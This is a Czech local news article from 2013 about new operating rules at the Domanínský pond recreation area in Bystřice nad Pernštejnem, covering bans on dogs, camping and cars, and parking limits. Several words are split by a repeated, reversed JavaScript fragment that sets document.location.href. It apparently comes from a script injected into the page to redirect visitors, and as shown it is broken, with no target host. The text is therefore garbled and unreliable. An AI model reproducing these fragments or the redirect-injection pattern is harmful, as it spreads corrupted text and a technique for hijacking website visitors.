Bystřice nad Pernštejnem, Domanínský rybník, zákaz
Rainbow page separator

U Domanínského rybníka platí nový řád

Středa, 28. srpna 2013

Bystřice nad Pernštejnem / Zákaz volného pobíhání psů i jiných zvířat, zákaz táboření a stanování mimo tábořiště, ale například i zákaz vjezdu mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torových vozidel a vymezení místa parkování obsahuje nový provozní řád v rekreační lokalitě u Domanínského rybníka. Schválili ho bystřičtí radní. „Jako vlastníci příměstského rekreačního areálu jsme byli novým nájemcem požádáni o přijetí určitých pravidel s tím, že osoby, které se jimi budou odmítat řídit, mohou být z lokality vykázány, případně i za součinnosti policie,“ uvedl bystřický mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Josef Vojta.
Přesně vymezeno je kupříkladu parkování v lokalitě – lidé mohou nechávat své au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobily výhradně na „horním“ parkovišti u silnice I/19, zakázáno je parkování poblíž rybníka, ať už před hrází, anebo za ní. Výjimku mají pouze rekreanti uby[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaní přímo areálu. Značka se zákazem vjezdu je sice u odbočky k rybníku ze silnice I/19 umístěna už řadu let, avšak řidiči ji příliš nerespektují a auta odstavují až u rybníka.